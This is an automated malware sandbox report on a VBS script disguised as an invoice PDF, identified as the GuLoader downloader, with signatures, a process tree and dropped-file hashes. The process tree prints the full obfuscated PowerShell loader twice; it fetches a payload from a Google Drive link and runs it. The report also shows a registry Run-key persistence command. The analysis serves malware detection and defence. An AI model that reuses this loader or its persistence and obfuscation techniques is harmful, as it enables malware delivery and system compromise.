Analysis
-
max time kernel
299s -
max time network
302s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
19-09-2024 06:31
General
-
Target
19092024_0631_Faktura_7122128240�pdf.vbs
-
Size
7KB
-
MD5
cc6e41e0786764096a50057a3743e7c6
-
SHA1
2493a1410d91a8084249ef9f0b3e7aa885ddef5d
-
SHA256
7e4a39824d8b86485d45a17ebd90a40e02a356a6a3457574303853decb61e09d
-
SHA512
5bfe75eb2661459a1073348cfadb64ced142baae9ff54fcd7a8733ae7ffc750f9ab41f2e1415ed275c7ec9f33257a7201bf0e5881ff0d26c2eac644c04aee38c
-
SSDEEP
96:lmXU2FvaJR+t7tVQm+83tkD3J8j0dEvOItsLQWSK+PtevdOYPmCVUbtCpgjPVHQv:lmk2VaJeXj0exCnItmd/Pml9jPp4jQYB
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19092024_0631_Faktura_7122128240�pdf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Automanipulation='sramana';$Arsenyl=${host}.Runspace;If ($Arsenyl) {$Forhjulstrkket++;$Automanipulation+='Periosteum';$Miljreform='s';$Automanipulation+='Kostfri';$Miljreform+='ubst';$Automanipulation+='simarubaceous';$Miljreform+='ri';$Automanipulation+='Unindigenous';$Miljreform+='ng';};Function Diskpladsers76($Fimsenes){$Glycocholate51=$Fimsenes.Length-$Forhjulstrkket;For( $Agrin=1;$Agrin -lt $Glycocholate51;$Agrin+=2){$Callahan10+=$Fimsenes.$Miljreform.'Invoke'( $Agrin, $Forhjulstrkket);}$Callahan10;}function Albueben($Rundhaandedes){ . ($Forlbelsers) ($Rundhaandedes);}$Kontinuerliges193=Diskpladsers76 'KMboUzGiBl.lCa /P5 .M0s (,WGi,nsdCoswssM NATU F1 0R.P0 ;T .W i nF6F4L; RxC6 4 ;, Or v :U1 2 1c.O0 ) OGNe cAkTo /.2 0s1 0.0 1s0K1G DFci r,eBfBoixM/s1F2 1 . 0 ';$Eskortefartjernes=Diskpladsers76 ',UKs e rM-NA g,eCnBt ';$Bldgrers=Diskpladsers76 'ChOtstFp s : /T/.d.r.iPvTeK.EgMoKo gFlFe .AcEo,mp/Au,cJ?Ee xsp o r t =NdCo,wEnsl oPaIdP& iPd,=B1bC,7 HC1 t f U mCn _ajsU C F KDlFE.8asJ6UFsFL_,0 M Y,v Y n gA9 iH ';$Foresattes=Diskpladsers76 ',>. ';$Forlbelsers=Diskpladsers76 'Oi e xP ';$skandinavismens='Hrenes';$Konsignationen = Diskpladsers76 'DeNc hGo .%.a pFp dEa tFa.%.\KT hPeRiss..,W,e eP &,&U e.cFhFo, st, ';Albueben (Diskpladsers76 ' $ g.l okb a l.:ssAc.o u,r,sI=B( c m.d, /Oc .$ KCo,nFsDi g nma,tCi o nGeTnr)I ');Albueben (Diskpladsers76 '.$Pgsl,oTbVaslB: LPi qNu iRd,iEz eCd.6 6R=K$ BVlsdFg r e r s .Us p lEiPtM(.$ FZoFr.e,s ast t.eXs ). ');Albueben (Diskpladsers76 'R[sNTe t . sbe rNveiOcbe,P oIifnBt M a nTaEgAeCrU].:,: s etc uArRi t y P,rNo.tsoDc,oBlT T=. .[.N eDt,.Bsme cPu r iUt yRPDr ost.o,cEoNlPT y pCe ]s:D: T.l sF1E2, ');$Bldgrers=$Liquidized66[0];$sknnere= (Diskpladsers76 'G$Ug lDoTb.a,lF:FCTosp isnbgBs =FNUeBw.-VOYbUj,ePc.t Ps y s.t.eBm . N.eAt .TWCeFb C.l.iAeTn t');$sknnere+=$scours[1];Albueben ($sknnere);Albueben (Diskpladsers76 't$.Cso,p.i.n gBs...H,e,a.dseOrHsN[E$.EOs.kMoNr tCeIfEairHt jReArHn.ets ] = $.K,o n t i.n u e r.l i g e sC1 9 3U ');$Opt=Diskpladsers76 ' $ CIoIp.iDnBg.ss. D o w.n lOo aGd F iFl eB( $ BPlsdIg r.e,r.sD,,$CD iCePs,e.l i zTaBt iPo nEsO)F ';$Dieselizations=$scours[0];Albueben (Diskpladsers76 ' $Tg,l o b aTl,:,B o y efs =,(CTEessOtA-YP a tLh, P$TDHiLeTs,eEl iEz aNtPi o.nDsU)s ');while (!$Boyes) {Albueben (Diskpladsers76 'a$ g l oPb,asl : sOm i.t.aBbBl e,=P$at rVuKe ') ;Albueben $Opt;Albueben (Diskpladsers76 ' sPtUa,r,t.-fs lPesesps R4, ');Albueben (Diskpladsers76 ',$BgslRo,b aWl :,BLo yDeRs =M( TGe.sHtM-OP.aMtshP M$,DsireLs eFl i z.a t.iEo,nFs ) ') ;Albueben (Diskpladsers76 'I$ g l,o,b.aulT:EG r u nEd.sBk u d dPeVt,9,0s=.$FgRl oTb aslB:IL nCsPu.msmUe rL+B+C%A$ LDiAqsu i dPiBzPe dH6.6P. c oAuan,t. ') ;$Bldgrers=$Liquidized66[$Grundskuddet90];}$Rensningsforanstaltninger=311121;$Denaturerende=27562;Albueben (Diskpladsers76 ' $sgPlso,b a.l :bF o rAr.eGtKnPipn g.s gAr uFn dsl a g =W G.e tD-MCsoGnEtAeAn tR H$HD iOeMsLe,l,i zIaRtUi,o,n s. ');Albueben (Diskpladsers76 'A$.g lPo b a ls:NsBp eTc,i f.iTkUaTtsiso,n s m e t o dFiBkCsB .=, ,[ sfy sOtsePmH. C,o nPv eArCtA]d:C:AF,r oFmGBGa s eB6 4,s.t.rEiUnAg ( $GF osrsrPe.t nei n g sOg rAu nCdslmaHgE)M ');Albueben (Diskpladsers76 '.$ gsl o bVaTl :.GraFl a,nBe r b= k[ sAyUs,tIesmK.,T.e.xPta.IE.nsc oVd,iHn,g ],:s:KAFs C,I Ie. GTe,tFs,t.r,iPnDgD(,$Ks.p e c.i.f i ksaAt.iPo nss,mTe.t o d,i.k s )T ');Albueben (Diskpladsers76 'g$Fg l,oKb,aHl :.H a eUm.n i nTg.= $sG.aLl a,nEe r,.Ns u,b,sAtGr i,nLg.(s$HR e.n,s.n.i nRg,sRf o.r.a,n,s,tAa l t,nRi n,gse rb,s$ DWe nGa,t u rMe.rReDnsdCes)I ');Albueben $Haemning;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Theis.Wee && echo t"3⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Automanipulation='sramana';$Arsenyl=${host}.Runspace;If ($Arsenyl) {$Forhjulstrkket++;$Automanipulation+='Periosteum';$Miljreform='s';$Automanipulation+='Kostfri';$Miljreform+='ubst';$Automanipulation+='simarubaceous';$Miljreform+='ri';$Automanipulation+='Unindigenous';$Miljreform+='ng';};Function Diskpladsers76($Fimsenes){$Glycocholate51=$Fimsenes.Length-$Forhjulstrkket;For( $Agrin=1;$Agrin -lt $Glycocholate51;$Agrin+=2){$Callahan10+=$Fimsenes.$Miljreform.'Invoke'( $Agrin, $Forhjulstrkket);}$Callahan10;}function Albueben($Rundhaandedes){ . ($Forlbelsers) ($Rundhaandedes);}$Kontinuerliges193=Diskpladsers76 'KMboUzGiBl.lCa /P5 .M0s (,WGi,nsdCoswssM NATU F1 0R.P0 ;T .W i nF6F4L; RxC6 4 ;, Or v :U1 2 1c.O0 ) OGNe cAkTo /.2 0s1 0.0 1s0K1G DFci r,eBfBoixM/s1F2 1 . 0 ';$Eskortefartjernes=Diskpladsers76 ',UKs e rM-NA g,eCnBt ';$Bldgrers=Diskpladsers76 'ChOtstFp s : /T/.d.r.iPvTeK.EgMoKo gFlFe .AcEo,mp/Au,cJ?Ee xsp o r t =NdCo,wEnsl oPaIdP& iPd,=B1bC,7 HC1 t f U mCn _ajsU C F KDlFE.8asJ6UFsFL_,0 M Y,v Y n gA9 iH ';$Foresattes=Diskpladsers76 ',>. ';$Forlbelsers=Diskpladsers76 'Oi e xP ';$skandinavismens='Hrenes';$Konsignationen = Diskpladsers76 'DeNc hGo .%.a pFp dEa tFa.%.\KT hPeRiss..,W,e eP &,&U e.cFhFo, st, ';Albueben (Diskpladsers76 ' $ g.l okb a l.:ssAc.o u,r,sI=B( c m.d, /Oc .$ KCo,nFsDi g nma,tCi o nGeTnr)I ');Albueben (Diskpladsers76 '.$Pgsl,oTbVaslB: LPi qNu iRd,iEz eCd.6 6R=K$ BVlsdFg r e r s .Us p lEiPtM(.$ FZoFr.e,s ast t.eXs ). ');Albueben (Diskpladsers76 'R[sNTe t . sbe rNveiOcbe,P oIifnBt M a nTaEgAeCrU].:,: s etc uArRi t y P,rNo.tsoDc,oBlT T=. .[.N eDt,.Bsme cPu r iUt yRPDr ost.o,cEoNlPT y pCe ]s:D: T.l sF1E2, ');$Bldgrers=$Liquidized66[0];$sknnere= (Diskpladsers76 'G$Ug lDoTb.a,lF:FCTosp isnbgBs =FNUeBw.-VOYbUj,ePc.t Ps y s.t.eBm . N.eAt .TWCeFb C.l.iAeTn t');$sknnere+=$scours[1];Albueben ($sknnere);Albueben (Diskpladsers76 't$.Cso,p.i.n gBs...H,e,a.dseOrHsN[E$.EOs.kMoNr tCeIfEairHt jReArHn.ets ] = $.K,o n t i.n u e r.l i g e sC1 9 3U ');$Opt=Diskpladsers76 ' $ CIoIp.iDnBg.ss. D o w.n lOo aGd F iFl eB( $ BPlsdIg r.e,r.sD,,$CD iCePs,e.l i zTaBt iPo nEsO)F ';$Dieselizations=$scours[0];Albueben (Diskpladsers76 ' $Tg,l o b aTl,:,B o y efs =,(CTEessOtA-YP a tLh, P$TDHiLeTs,eEl iEz aNtPi o.nDsU)s ');while (!$Boyes) {Albueben (Diskpladsers76 'a$ g l oPb,asl : sOm i.t.aBbBl e,=P$at rVuKe ') ;Albueben $Opt;Albueben (Diskpladsers76 ' sPtUa,r,t.-fs lPesesps R4, ');Albueben (Diskpladsers76 ',$BgslRo,b aWl :,BLo yDeRs =M( TGe.sHtM-OP.aMtshP M$,DsireLs eFl i z.a t.iEo,nFs ) ') ;Albueben (Diskpladsers76 'I$ g l,o,b.aulT:EG r u nEd.sBk u d dPeVt,9,0s=.$FgRl oTb aslB:IL nCsPu.msmUe rL+B+C%A$ LDiAqsu i dPiBzPe dH6.6P. c oAuan,t. ') ;$Bldgrers=$Liquidized66[$Grundskuddet90];}$Rensningsforanstaltninger=311121;$Denaturerende=27562;Albueben (Diskpladsers76 ' $sgPlso,b a.l :bF o rAr.eGtKnPipn g.s gAr uFn dsl a g =W G.e tD-MCsoGnEtAeAn tR H$HD iOeMsLe,l,i zIaRtUi,o,n s. ');Albueben (Diskpladsers76 'A$.g lPo b a ls:NsBp eTc,i f.iTkUaTtsiso,n s m e t o dFiBkCsB .=, ,[ sfy sOtsePmH. C,o nPv eArCtA]d:C:AF,r oFmGBGa s eB6 4,s.t.rEiUnAg ( $GF osrsrPe.t nei n g sOg rAu nCdslmaHgE)M ');Albueben (Diskpladsers76 '.$ gsl o bVaTl :.GraFl a,nBe r b= k[ sAyUs,tIesmK.,T.e.xPta.IE.nsc oVd,iHn,g ],:s:KAFs C,I Ie. GTe,tFs,t.r,iPnDgD(,$Ks.p e c.i.f i ksaAt.iPo nss,mTe.t o d,i.k s )T ');Albueben (Diskpladsers76 'g$Fg l,oKb,aHl :.H a eUm.n i nTg.= $sG.aLl a,nEe r,.Ns u,b,sAtGr i,nLg.(s$HR e.n,s.n.i nRg,sRf o.r.a,n,s,tAa l t,nRi n,gse rb,s$ DWe nGa,t u rMe.rReDnsdCes)I ');Albueben $Haemning;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Theis.Wee && echo t"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Heliometry% -w 1 $Rrligst138=(Get-ItemProperty -Path 'HKCU:\Hyperaktuelles\').Midwintry;%Heliometry% ($Rrligst138)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Heliometry% -w 1 $Rrligst138=(Get-ItemProperty -Path 'HKCU:\Hyperaktuelles\').Midwintry;%Heliometry% ($Rrligst138)"6⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4060,i,9445584274764997943,12714240264001792460,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:81⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5b3b6d692d3c83ab57db5678a8f3080fa
SHA1acea5e9d391253e542985447e4ff3e3437c02521
SHA256d49c31b2e37312c576fe5bbd97a59e5bf8b5ea4d8cfaae0ad1d0500ff7c30d7d
SHA51288a04bac5e814538ff429dacdf6c3ba58ee44b76e34df181a93df81c441e11aa9e71d8abfe882243042d84a109e9aec246fd0446fb1912eda30c67a2dee42210
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
440KB
MD5101f0456c78a51dc6621f338fa0590e6
SHA1744017fe918a845dfc161516dab0f86579912507
SHA2563663b6fbf739bde311b85220fc41f266ec6f90cc6445c3ce77f3db94972aeac3
SHA512f56f372d17ee4843b3c68831d66549ccd9d72a4effebac7c53f4dda841d5454f4599f736db890f055604e2b179eab4c43836162567bdd1e63a598a807386a5f0
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
216KB
-
Filesize
136KB
-
Filesize
38.4MB
-
Filesize
5.6MB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
38.4MB
-
Filesize
18.3MB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
